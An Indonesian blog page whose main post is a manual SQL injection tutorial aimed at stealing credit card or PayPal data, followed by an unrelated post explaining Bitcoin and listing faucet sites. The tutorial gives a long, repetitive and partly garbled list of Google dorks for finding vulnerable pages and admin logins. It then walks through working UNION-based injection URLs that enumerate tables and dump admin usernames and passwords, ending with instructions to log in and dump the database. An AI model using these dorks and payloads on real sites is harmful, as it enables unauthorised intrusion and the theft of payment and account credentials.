twitter
googleplus
facebook

[Tutorial]cara mencari CC atau akun paypal dengan SQL INJECTION Manual

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat meng insert perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : id=$id;……. > Got Error

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url


Dork list:

Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl : pro.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:shop+php?id+site:fr
“inurl:admin.asp”
“inurl:login/admin.asp”
“inurl:admin/login.asp”
“inurl:adminlogin.asp”
“inurl:adminhome.asp”
“inurl:admin_login.asp”
“inurl:administratorlogin.asp”
“inurl:login/administrator.asp”
“inurl:administrator_login.asp”
inurl:”id=” & intext:”Warning: mysql_fetch_assoc()
inurl:”id=” & intext:”Warning: mysql_fetch_array()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: is_writable()
inurl:”id=” & intext:”Warning: getimagesize()
inurl:”id=” & intext:”Warning: Unknown()
inurl:”id=” & intext:”Warning: session_start()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: pg_exec()
inurl:”id=” & intext:”Warning: mysql_result()
inurl:”id=” & intext:”Warning: mysql_num_rows()
inurl:”id=” & intext:”Warning: mysql_query()
inurl:”id=” & intext:”Warning: array_merge()
inurl:”id=” & intext:”Warning: preg_match()
inurl:”id=” & intext:”Warning: ilesize()
inurl:”id=” & intext:”Warning: filesize()
inurl:”id=” & intext:”Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:login.asp
index of:/admin/login.asp
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:produit.php?id=+site:fr
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

Quote:Contoh :
http://impgang dot com/news.php?id=14’
http://impgang dot com/news.php?id=’14

Apabila terlihat pesan error seperti ini :
Quote:You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Maka bisa dipastikan situs tersebut terdapat bug SQL Injection :D

Lalu lanjut lagi menentukan Jumlah Kolom
caranya :
Quote: http://www.site.com/news.php?id=7 order by 1-- || Gak Error

http://www.site.com/news.php?id=7 order by 2-- || Gak Error

http://www.site.com/news.php?id=7 order by 3-- || Gak Error

http://www.site.com/news.php?id=7 order by 4-- || Gak Error

http://www.site.com/news.php?id=7 order by 5-- || Gak Error

http://www.site.com/news.php?id=7 order by 6-- || Gak Error

http://www.site.com/news.php?id=7 order by 7-- || error

Nah kita mengetahui kalau kolom ke 7 itu Error artinya Website hanya memiliki 6 Kolom karena pada kolom nomor 7 sudah tidak ada hubungannya dengan kolom yang lainnya.
Jika kita membuka kolom yang Error maka terlihat seperti ini:
Quote:Unknown column '7' in 'order clause'


Lalu selanjutnya kita gunakan perintah fungsi union untuk menampilkan area kolom yang vuln . Gunakan perintah "Union Select" tanpa tanda petik.
caranya, ganti kata "order by" menjadi "Union Select", lalu setelah "id=" kita tambahkan saja tanda (-) gak pake tanda kurung lalu jika error tepat pada angka yg vuln (contoh angka 7) maka kalian urutkan dari angka 1 sampai 6 karena angka 7 Error.

Terlihat seperti ini:
Quote:Sebelum
http://www.site.com/news.php?id=7 order by 6-- (Karena Angka 7 Error Maka di ganti menjadi 6)

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--
jika berhasil seharusnya kita bisa melihat area kolom yang vuln.
maksudnya begini, area kolom yang vuln itu adalah nomor yang barusan kita buat lalu terpampang di website . Jadi begini, kalian sudah mencari vuln dengan urutan 1,2,3,4,5,6 . maka dari urutan 1,2,3,4,5,6 pasti akan terpampang salah satu nomor tersebut di website.

Next setelah itu kita akan mencoba Cek Versi MYSQL yang digunakan
untuk mengetahui versi mysql kita gunakan "@@version" atau "version()" tanpa tanda petik.Dari hasil sebelumnya, sekarang kita gunakan untuk mengecek versi mysql, caranya ikuti langkah berikut. Misalkan kolom yang vuln yang tampil adalah nomor 4 maka ganti saja kolom 4 dengan "@@version" sehingga urlnya menjadi:
Quote:Sebelum
http://www.site.com/news.php?id=-7 union select 1,2,3,4,5,6--

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--
Sekarang kita bisa melihat versinya seperti 5.0.96 atau versi yang lainnya tetapi versi harus memiliki angka 5 didepannya.

Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah "@@version" dengan "group_concat(table_name)" dan menambahkan perintah "from information_schema.tables where table_schema=database()" sesudah angka terakhir , sebelum tanda --
Contohnya begini:
Quote:Sebelum
http://www.site.com/news.php?id=-7 union select 1,2,3,@@version,5,6--

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--
Nah terlihat ada nama table table di site yg kalian praktekkan
misalnya terlihat ada table admin, research, vcounter
maka kita akan memproses table admin sehingga kita mendapatkan Username dan Passwordnya, tetapi sayangnya, tidak semua website langsung menampakkan Table admin,tapi kalian bisa cari disatu-satu table yang muncul disite kalian.

Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah "group_concat(table_name)" dengan perintah "group_concat(column_name)" dan mengganti perintah "information_schema.tables" menjadi "information_schema.columns" juga mengganti perintah "table_schema=database()" dengan perintah "table_name=" lalu menambahkan nama tablenya tapi yg sudah di convert menjadi hex sesudah tanda (=) tanpa tanda kurung dan diawali dengan 0x . Ini website untuk convert Text menjadi Hex
Contohnya begini:
Admin < Ini Text
lalu di convert ke Hex dan tambahkan "0x" diawal maka jadilah
Admin(text) -> 61646d696e(hex) -> 0x61646d696e(table)
nah jadi terlihat link seperti ini:
Quote:Sebelum
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

Contoh Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=HASIL CONVERT TEXT KE HEX--

Note :HASIL CONVERT TEXT KE HEX yaitu hasil convert dari nama table yang barusan kalian Convert

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--
nah tiba-tiba muncul kolom id,admin_id,admin_pass pada tabel admin tadi.

Oke selanjutnya cara mengeluarkan data column,caranya cukup gampang
kalian tinggal mengganti "group_concat(column_name)" menjadi "group_concat(admin_id,0x3a,admin_pass)" lalu ganti "information_schema.columns where table_name=CODEHEX--" menjadi "admin"

Question : mengapa saya masukkan admin_id,0x3a,admin_pass dan apa maksud dari 0x3a lalu kenapa "information_schema.columns where table_name=CODEHEX" diganti menjadi "admin"?

Answer : karena admin_id dan admin_pass adalah nama kolom pada tabel Admin yang barusan saya convert ke Hex.
kalau 0x3a itu sebenarnya Code jika kita convert ke hex itu artinya (:) titik dua. saya menggantinya karena perintah itu tidak digunakan lagi karena kita sudah menemukan Tabel dan Kolomnya dan makanya saya hapus Information_schema.columns... dan menggantinya menjadi admin karena kita akan membongkar isi tabel tersebut.


WARNING:JANGAN SAMAKAN NAMA TABEL CONTOH INI DENGAN NAMA TABEL YANG SEDANG ANDA PRAKTEKKAN


Maka terlihat seperti ini:
Quote:Sebelum
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_name=0x61646d696e--

Sesudah
http://www.site.com/news.php?id=-7 union select 1,2,3,group_concat(admin_id,0x3a,admin_pass),5,6 from admin--
Akhirnya berhasil.. kalian akan mendapatkan username dan password admin diwebsite yang barusan kalian praktekan
contohnya seperti ini:
[Image: step7.png]

Setelah itu cari halaman login admin di website setelah itu loginkan username adminnya dan dump semua databasenya

Mengenal Bitcoin Dan Cara Mendapatkannya Secara Gratis


Bitcoin adalah sebuah uang elektronik yang di buat pada tahun 2009 oleh Satoshi Nakamoto. Nama tersebut juga dikaitkan dengan perangkat lunak open source yang dia rancang, dan juga menggunakan jaringan peer-to-peer yang menghubungkan semuanya. Tidak seperti mata uang pada umumnya, bitcoin tidak tergantung dengan mempercayai penerbit utama. Bitcoin menggunakan sebuah database yang didistribusikan dan menyebar ke node - node dari sebuah jaringan P2P ke jurnal transaksi, dan menggunakan kriptografi untuk menyediakan fungsi - fungsi keamanan dasar, seperti memastikan bahwa bitcoin - bitcoin hanya dapat di habiskan oleh orang mempunyainya, dan tidak boleh dilakukan lebih dari satu kali.

Desain dari Bitcoin memperbolehkan untuk kepemilikan tanpa identitas (anonymous) dan pemindahan kekayaan. Bitcoin - bitcoin dapat di simpan di komputer pribadi dalam sebuah format file wallet atau di simpan oleh sebuah servis wallet pihak ketiga, dan terlepas dari semua itu Bitcoin - bitcoin dapat di kirim lewat internet kepada siapapun yang mempunyai sebuah alamat Bitcoin. Topologi peer-to-peer bitcoin dan kurangnya administrasi tunggal membuatnya tidak mungkin untuk otoritas, pemerintahan apapun, untuk memanipulasi nilai dari bitcoin - bitcoin atau menyebabkan inflasi dengan memproduksi lebih banyak bitcoin.
Singkatnya bitcoin adalah mata uang elektronik yang didasari oleh teknologi yang paling baru dan mulai menjadi pilihan sebagai pengganti emas. Bitcoin sendiri dibuat dari gabungan berbagai teknologi dari cryptografi, ekonomi dan network membentuk sebuah program yang terdiri dari network peer-to-peer yang kokoh dan hampir mustahil untuk diserang, teknologi atau lebih tepatnya mata uang baru ini disebut cryptocurrency. Bitcoin ini pada akhirnya berfungsi sebagai mata uang.

Berdasarkan DailyDotCom penggunaan Bitcoin atau mata uang cryptografi ini terus meningkat drastis. Tahun 2012 lalu titik transaksi tertinggi berhasil diraih dengan transaksi mencapai 58.000 per hari. Sekarang setelah tahun baru transaksi Bitcoin terus stabil pada titik 50.000 transaksi per harinya. Pengguna internet terus antusias menggunakan bitcoin sebagai mata uang internet yang sepenuhnya bersifat digital. Bahkan perusahaan raksasa seperti Wordpress sekarang menerima mata uang bitcoin dalam penyediaan jasanya. Berdasarkan Forbes bitcoin menjadi alternatif mata uang yang populer karena kemudahannya dalam penggunaannya, sistem yang terdesentralisasi dan akses yang tersedia untuk semua orang menjadi daya tarik utama dalam mata uang ini.

Bahkan Bitcoin sendiri pernah dikabarkan menjadi saingan utama industri perbankan. Macleans menuturkan bahwa Bitcoin berbeda dengan mata uang online yang pernah ada di internet. Sistem yang terdesentralisasi berarti peredaran uang tidak bisa diatur oleh siapapun. Dan layaknya uang kas, transaksi bitcoin terjadi langsung dari orang ke orang tanpa perantara sehingga biaya pengiriman sangatlah minim dan transaksi ini terjadi tanpa ada batasan apapun. Sistem yang terdesentralisasi juga menjaga keamanan privasi pemilik bitcoin dan memastikan bahwa uang bitcoin mereka tidak bisa dibekukan oleh siapapun. Penggunaan bitcoin sendiri juga terus meningkat. Mt.Gox, exchanger bitcoin terbesar menunjukkan bahwa mereka telah melakukan penukaran bitcoin dengan dollar hingga mencapai titik fantastis sebesar $3 juta dollar dengan nilai tukar 1 bitcoin untuk 13 dollar. Kedepannya bitcoin diramalkan akan terus meningkat dan pengguna bitcoin akan terus bertambah.



Seperti layaknya mata uang lainnya Bitcoin telah digunakan di banyak tempat seperti :
Perdagangan barang umumnya seperti di Forum Jual Beli : Bitmit, BitcoinMarketPlace.
Penukar Bitcoin dengan mata uang lain seperti USD, Yen, Euro, dll : mtgox, bitcoincharts.
Forex menggunakan bitcoin : Bit4X, FirstNationaLib.
Penyedia jasa penyimpanan wallet bitcoin. Berfungsi layaknya account Paypal, LR dll : BlockChain, CoinBase, WalletBit.
Untuk mengetahui tentang bitcoin lebih lanjut anda dapat melihat di weusecoins.com atau bitcoin.org.

harga 1 BTC setara $1016, sungguh besar bukan.

Sekarang saya akan membagikan cara mendapatkan bitcoin secara GRATIS, tetapi sebelum mendapatkan Bitcoin, anda harus memiliki wallet tempat menyimpan Bitcoin yang anda dapatkan. Untuk membuat wallet bitcoin, silahkan ikuti petunjuk dibawai ini :
-Buka situs Blockchain(bisa dicari di google)
-klik wallet
-Setelah mengikuti langkah pada Poin 2 anda akan dibawa pada halaman berikut :

-Klik Start A New Wallet dan anda akan masuk pada halaman form pendaftaran.
-Setelah anda login ke wallet yang telah dibuat tadi, anda akan diberikan alamat wallet yang menjadi sarana untuk menerima dan mengirim bitcoin. Alamat wallet anda berupa gabungan angka dan hutuf contohnya : 19ZZ8DZsb5qhtchuKPZWET7Uj8rDoj4KgmB.

Jika anda sudah memiliki wallet bitcoin, sekarang saatnya saya akan membagikan dimana anda bisa mendapatkan bitcoin secara gratis.

Tempat berburu Bitcoin gratis :

NameDescriptionLink
Bitcoins4meDapatkan Bitcoins gratis setiap 1 jamVisit
BitcoinerDapatkan bitcoin gratis dalam jumlah acak setiap 24 jamVisit
BitvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin4youDapatkan hingga 0,42 mBTC setiap 24 jamVisit
Earn free bitcoinsDapatkan hingga 24 uBTC per hariVisit
NetlookupDapatkan Bitcoins gratis setiap 24 jamVisit
CointicketDapatkan Bitcoins gratis setiap 24 jamVisit
BitcointreeDapatkan Bitcoins gratis setiap 24 jamVisit
CoinvisitorDapatkan bicoins gratis dengan melihat iklanVisit
Bitcoin AddictDapatkan 0,00006 BTC, dan kesempatan untuk menang jackpot 0,01 BTCVisit
Bunny RunDapatkan Bitcoins gratis setiap 24 jam dengan bermain mini gameVisit
ElbitcoingratisDapatkan Bitcoins gratis setiap 1 jamVisit
Coinad Register dan dapatkan Bitcoins gratis dengan melihat iklanVisit
CointubeMasukkan address bitcoin anda, solve captcha, dan klik video untuk ditontonVisit
Free BTCRegister terlebih dahulu, setelah itu anda bisa mendapatkan bitcoin dari menonton video dan mengetik captchaVisit
Btc4youDapatkan Bitcoins gratis setiap 30 menitVisit
GreencoinsDapatkan Bitcoins gratis setiap 30 menitVisit
NioctibDapatkan Bitcoins gratis setiap 30 menitVisit
The Free BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
Virtual FaucetDapatkan Bitcoins gratis setiap 30 menitVisit
SrbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Raw BitcoinsDapatkan Bitcoins gratis setiap 30 menitVisit
CanhasbitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Freebtc4allDapatkan Bitcoins gratis setiap 30 menitVisit
BTC MineDapatkan Bitcoins gratis setiap 30 menitVisit
The BitcoinDapatkan Bitcoins gratis setiap 30 menitVisit
Faucet BTCDapatkan Bitcoins gratis setiap 10 menitVisit
Bitcoin ForestDapatkan Bitcoins gratis setiap 1 jamVisit
Honey BitcoinDapatkan bicoins gratis dengan melihat iklanVisit
